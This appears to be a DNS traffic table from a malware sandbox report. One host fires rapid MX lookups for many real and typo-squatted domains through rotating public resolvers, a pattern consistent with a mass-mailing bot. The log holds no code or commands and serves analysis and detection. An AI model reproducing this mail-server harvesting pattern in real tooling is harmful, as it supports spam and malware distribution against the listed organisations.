                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.405668974 CEST192.168.2.3208.67.222.2220xae52Standard query (0)deepakfasteners.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.419065952 CEST192.168.2.38.8.4.40xbd52Standard query (0)dnsdeer.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.419807911 CEST192.168.2.31.0.0.10xb753Standard query (0)paradigma.bizMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.420140028 CEST192.168.2.38.8.8.80xb753Standard query (0)gaml.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.420445919 CEST192.168.2.39.9.9.90xb753Standard query (0)rightstartmortgage.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.420725107 CEST192.168.2.3208.67.220.2200xb753Standard query (0)zhuko.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.421009064 CEST192.168.2.38.8.8.80xb753Standard query (0)songwriter.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.421324015 CEST192.168.2.3208.67.220.2200xb753Standard query (0)oranek.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.421627045 CEST192.168.2.31.0.0.10xb753Standard query (0)expotaranto.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.421952009 CEST192.168.2.31.0.0.10xb753Standard query (0)modeinfo.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.434823990 CEST192.168.2.3208.67.222.2220xc753Standard query (0)rentinriga.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.435571909 CEST192.168.2.38.8.4.40xc753Standard query (0)victoriamansion.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.435981989 CEST192.168.2.31.0.0.10xc753Standard query (0)o2.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.436574936 CEST192.168.2.31.1.1.10xc753Standard query (0)rjii.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.437119007 CEST192.168.2.38.8.4.40xc753Standard query (0)iaxs.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.437408924 CEST192.168.2.31.0.0.10xc753Standard query (0)vitor.tkMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.437889099 CEST192.168.2.38.8.8.80xc753Standard query (0)indorama-ind.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.654603004 CEST192.168.2.31.0.0.10xd154Standard query (0)eriksminde.dkMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.655025959 CEST192.168.2.31.1.1.10xd154Standard query (0)send.aweber.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.656449080 CEST192.168.2.39.9.9.90xd154Standard query (0)gyn.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.657258034 CEST192.168.2.3208.67.222.2220xd154Standard query (0)ftc-i.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.657783985 CEST192.168.2.31.0.0.10xd154Standard query (0)barracuda.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.658305883 CEST192.168.2.3208.67.222.2220xd154Standard query (0)pec.vittoriaassicurazioni.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.658900976 CEST192.168.2.31.0.0.10xd154Standard query (0)leva.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.659440994 CEST192.168.2.3208.67.222.2220xd154Standard query (0)gmfi.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.659873962 CEST192.168.2.31.0.0.10xd154Standard query (0)ipsolutionz.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.669532061 CEST192.168.2.3149.112.112.1120xda55Standard query (0)thehealthline.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.669878006 CEST192.168.2.31.0.0.10xda55Standard query (0)cartadelapau.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.670201063 CEST192.168.2.38.8.4.40xda55Standard query (0)acquitygroup.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.670557022 CEST192.168.2.31.0.0.10xda55Standard query (0)hertspartsft.nhs.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.670788050 CEST192.168.2.38.8.4.40xda55Standard query (0)iutlook.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.671122074 CEST192.168.2.39.9.9.90xda55Standard query (0)reaganfoundation.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.671667099 CEST192.168.2.38.8.8.80xda55Standard query (0)webtempmail.onlineMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.671667099 CEST192.168.2.38.8.8.80xda55Standard query (0)mepotelco.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.671968937 CEST192.168.2.39.9.9.90xda55Standard query (0)zeiss.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.672363043 CEST192.168.2.31.1.1.10xda55Standard query (0)sabca.beMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.684601068 CEST192.168.2.3208.67.222.2220xea55Standard query (0)svdc.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.684860945 CEST192.168.2.31.1.1.10xea55Standard query (0)terradoliva.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.685390949 CEST192.168.2.3208.67.220.2200xea55Standard query (0)voiaj.mdMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.685575008 CEST192.168.2.3149.112.112.1120xea55Standard query (0)weber-metaux.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.685980082 CEST192.168.2.39.9.9.90xea55Standard query (0)reuters.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.686283112 CEST192.168.2.39.9.9.90xea55Standard query (0)swc-tx.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.686573029 CEST192.168.2.38.8.8.80xea55Standard query (0)pfleuger.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.686856985 CEST192.168.2.38.8.4.40xea55Standard query (0)cyberforma.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.687175989 CEST192.168.2.38.8.8.80xea55Standard query (0)mc708.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.687537909 CEST192.168.2.38.8.4.40xea55Standard query (0)epilla.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.700443029 CEST192.168.2.38.8.4.40xf955Standard query (0)hotmai.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.700799942 CEST192.168.2.3149.112.112.1120xf955Standard query (0)gocsc.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.701112986 CEST192.168.2.38.8.8.80xf955Standard query (0)uniroma2.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.701558113 CEST192.168.2.39.9.9.90xf955Standard query (0)tabbi.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.701886892 CEST192.168.2.38.8.4.40xf955Standard query (0)ryico.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.702225924 CEST192.168.2.3208.67.220.2200xf955Standard query (0)rcm.atMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.702857018 CEST192.168.2.31.1.1.10xf955Standard query (0)ebtnet.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.703068018 CEST192.168.2.31.1.1.10xf955Standard query (0)unav.esMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.703444958 CEST192.168.2.3208.67.222.2220xf955Standard query (0)wolfeborobible.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.716118097 CEST192.168.2.38.8.8.80x956Standard query (0)p-per.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.716631889 CEST192.168.2.38.8.4.40x956Standard query (0)cbdn.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.716995001 CEST192.168.2.39.9.9.90x956Standard query (0)uniparthenope.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.717372894 CEST192.168.2.38.8.4.40x956Standard query (0)vivify.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.717773914 CEST192.168.2.38.8.4.40x956Standard query (0)cargill.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.766655922 CEST192.168.2.31.1.1.10x3ac3Standard query (0)awal.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.061261892 CEST192.168.2.3156.154.125.700xa958Standard query (0)mx02.xnote.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.278620005 CEST192.168.2.31.1.1.10xdd31Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.497838974 CEST192.168.2.3221.215.1.2040xb05cStandard query (0)kelon.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.498867035 CEST192.168.2.3216.239.34.990xb05cStandard query (0)gmaul.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.499993086 CEST192.168.2.3138.197.103.1780xb05cStandard query (0)net-up.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.501163960 CEST192.168.2.3162.159.26.270xb05cStandard query (0)power-trac.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.507745981 CEST192.168.2.31.1.1.10x7816Standard query (0)ns2.myvdc.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.700628042 CEST192.168.2.31.1.1.10x8cb7Standard query (0)kairel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.002521038 CEST192.168.2.3185.70.118.2500x1561Standard query (0)whitemc.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.003127098 CEST192.168.2.3202.3.225.100x1561Standard query (0)bt.pfMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.004077911 CEST192.168.2.31.1.1.10x45c3Standard query (0)ns1.iptwins.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.294465065 CEST192.168.2.31.1.1.10xdd31Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.305666924 CEST192.168.2.3188.165.162.430x8663Standard query (0)spatial.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.306560993 CEST192.168.2.3216.16.120.1000x8663Standard query (0)starpoint.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.307358980 CEST192.168.2.3162.219.54.20x8663Standard query (0)uoit.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.309181929 CEST192.168.2.31.1.1.10xc2bdStandard query (0)ns37.domaincontrol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.473500013 CEST192.168.2.397.74.108.190x6b65Standard query (0)bettzedek.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.482412100 CEST192.168.2.31.1.1.10x7a65Standard query (0)vision-bg.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.485167980 CEST192.168.2.39.9.9.90x7a65Standard query (0)sbcglobqal.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.485527992 CEST192.168.2.3208.67.220.2200x7a65Standard query (0)bedmod.co.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.487224102 CEST192.168.2.3208.67.222.2220x7a65Standard query (0)3dplmsoftware.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.487613916 CEST192.168.2.39.9.9.90x7a65Standard query (0)my.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.487977028 CEST192.168.2.3208.67.220.2200x7a65Standard query (0)crvi.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.488679886 CEST192.168.2.31.0.0.10x7a65Standard query (0)blog-galaxy.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.488679886 CEST192.168.2.3208.67.222.2220x7a65Standard query (0)harlandale.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.489041090 CEST192.168.2.39.9.9.90x7a65Standard query (0)bulldognews.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.489386082 CEST192.168.2.31.0.0.10x7a65Standard query (0)nu.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.497163057 CEST192.168.2.3208.67.220.2200x8a65Standard query (0)cdw.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.497618914 CEST192.168.2.38.8.4.40x8a65Standard query (0)4uservizi.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.498321056 CEST192.168.2.38.8.8.80x8a65Standard query (0)cbse.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.499090910 CEST192.168.2.3208.67.220.2200x8a65Standard query (0)tspl-india.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.499639988 CEST192.168.2.38.8.8.80x8a65Standard query (0)juliemusic.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.500216961 CEST192.168.2.3208.67.222.2220x8a65Standard query (0)mesp.ptMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.500641108 CEST192.168.2.31.1.1.10x8a65Standard query (0)hanamail.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.501446009 CEST192.168.2.392.247.11.670x8a65Standard query (0)virusadv.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.504724979 CEST192.168.2.31.1.1.10x9a31Standard query (0)ns1.ignum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.560148001 CEST192.168.2.31.1.1.10x60c7Standard query (0)nblewis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.591074944 CEST192.168.2.31.1.1.10xe52bStandard query (0)gbmfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.828079939 CEST192.168.2.3185.65.223.350x4369Standard query (0)jees.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.840825081 CEST192.168.2.3149.112.112.1120x5369Standard query (0)bc.dmgarch.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.841624975 CEST192.168.2.38.8.4.40x5369Standard query (0)kierson.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.841624975 CEST192.168.2.31.1.1.10x5369Standard query (0)antiochgolfclub.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.842672110 CEST192.168.2.39.9.9.90x5369Standard query (0)livejournali.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.843106985 CEST192.168.2.39.9.9.90x5369Standard query (0)oktavist.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.843827963 CEST192.168.2.38.8.8.80x5369Standard query (0)turner.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.843828917 CEST192.168.2.3208.67.222.2220x5369Standard query (0)os.t-com.hrMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.844222069 CEST192.168.2.31.1.1.10x5369Standard query (0)mailsdfeer.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.856941938 CEST192.168.2.3149.112.112.1120x6269Standard query (0)kotic.nlMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.856944084 CEST192.168.2.39.9.9.90x6269Standard query (0)emael.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.857299089 CEST192.168.2.38.8.4.40x6269Standard query (0)optimagroupinc.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.857673883 CEST192.168.2.39.9.9.90x6269Standard query (0)pfizer.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.858068943 CEST192.168.2.3208.67.220.2200x6269Standard query (0)us.esMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.858472109 CEST192.168.2.38.8.4.40x6269Standard query (0)aqua-aerobic.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.858912945 CEST192.168.2.31.1.1.10x6269Standard query (0)lieblingslied-records.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.859395027 CEST192.168.2.38.8.4.40x6269Standard query (0)dgaccountants.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.859613895 CEST192.168.2.31.1.1.10x6269Standard query (0)sabrain.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.860527992 CEST192.168.2.3208.67.222.2220x6269Standard query (0)mainstaycomm.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.872240067 CEST192.168.2.38.8.4.40x7269Standard query (0)bhalotiainternational.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.873209953 CEST192.168.2.3208.67.220.2200x7269Standard query (0)cei.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.873434067 CEST192.168.2.39.9.9.90x7269Standard query (0)evertek.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.873810053 CEST192.168.2.31.0.0.10x7269Standard query (0)mcvts.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.874352932 CEST192.168.2.38.8.8.80x7269Standard query (0)vizi0n.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.874732018 CEST192.168.2.38.8.4.40x7269Standard query (0)event.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.875952959 CEST192.168.2.39.9.9.90x7269Standard query (0)parkbelles.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.875955105 CEST192.168.2.3149.112.112.1120x7269Standard query (0)icandi.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.876339912 CEST192.168.2.3208.67.222.2220x7269Standard query (0)ch-agen-nerac.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.888359070 CEST192.168.2.39.9.9.90x9169Standard query (0)onelinkpr.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.888830900 CEST192.168.2.38.8.4.40x9169Standard query (0)allstate.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.890316963 CEST192.168.2.3208.67.222.2220x9169Standard query (0)cellutissue.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.897209883 CEST192.168.2.3208.67.220.2200x9169Standard query (0)correiaecorreia.ptMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.897645950 CEST192.168.2.3149.112.112.1120x9169Standard query (0)doublea1991.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.898305893 CEST192.168.2.31.0.0.10x9169Standard query (0)vipmail.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.898305893 CEST192.168.2.3208.67.222.2220x9169Standard query (0)hlag.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.898705959 CEST192.168.2.31.1.1.10x9169Standard query (0)fibertel.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.899055004 CEST192.168.2.3149.112.112.1120x9169Standard query (0)certifiedtileandmarble.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.899472952 CEST192.168.2.3149.112.112.1120x9169Standard query (0)plumlogo.co.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.903696060 CEST192.168.2.3208.67.220.2200xa169Standard query (0)mailsadf.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.903697014 CEST192.168.2.31.1.1.10xa169Standard query (0)vivienvitolo.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.904092073 CEST192.168.2.3208.67.220.2200xa169Standard query (0)littlebrown.co.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.904366016 CEST192.168.2.3208.67.222.2220xa169Standard query (0)delta.dkMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.904716015 CEST192.168.2.3208.67.222.2220xa169Standard query (0)paulbunyan.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.905029058 CEST192.168.2.3208.67.222.2220xa169Standard query (0)productivitymind.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.905437946 CEST192.168.2.3149.112.112.1120xa169Standard query (0)sbcglo0bal.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.905734062 CEST192.168.2.38.8.4.40xa169Standard query (0)fsrinc.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.906157017 CEST192.168.2.3208.67.220.2200xa169Standard query (0)globo.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.919172049 CEST192.168.2.3208.67.220.2200xb069Standard query (0)selectivemetals.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.919590950 CEST192.168.2.38.8.8.80xb069Standard query (0)archi3.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.920000076 CEST192.168.2.39.9.9.90xb069Standard query (0)wesco.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.920800924 CEST192.168.2.31.1.1.10xb069Standard query (0)mavenir.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.920800924 CEST192.168.2.38.8.8.80xb069Standard query (0)hotmial.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.921180964 CEST192.168.2.31.0.0.10xb069Standard query (0)nusantaramotor.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.921631098 CEST192.168.2.31.1.1.10xb069Standard query (0)riminireservation.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.934639931 CEST192.168.2.31.0.0.10xc069Standard query (0)hostcalls.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.935170889 CEST192.168.2.3149.112.112.1120xc069Standard query (0)antares-design.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.935589075 CEST192.168.2.39.9.9.90xc069Standard query (0)rxlps.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.935992002 CEST192.168.2.38.8.4.40xc069Standard query (0)harrahs.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.936774015 CEST192.168.2.39.9.9.90xc069Standard query (0)i3p.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.936774015 CEST192.168.2.39.9.9.90xc069Standard query (0)lectotum.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.937238932 CEST192.168.2.31.1.1.10xc069Standard query (0)emails-like-snails.bidMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.937571049 CEST192.168.2.3208.67.220.2200xc069Standard query (0)myfam.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.950469971 CEST192.168.2.38.8.8.80xd069Standard query (0)nktelco.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.950992107 CEST192.168.2.38.8.8.80xd069Standard query (0)getlostxx.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.952709913 CEST192.168.2.39.9.9.90xd069Standard query (0)ovam.beMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.953206062 CEST192.168.2.3149.112.112.1120xd069Standard query (0)mail-th.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.953377008 CEST192.168.2.39.9.9.90xd069Standard query (0)mcpe.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.953726053 CEST192.168.2.3208.67.222.2220xd069Standard query (0)hanaw.comMX (Mail exchange)IN (0x0001)false
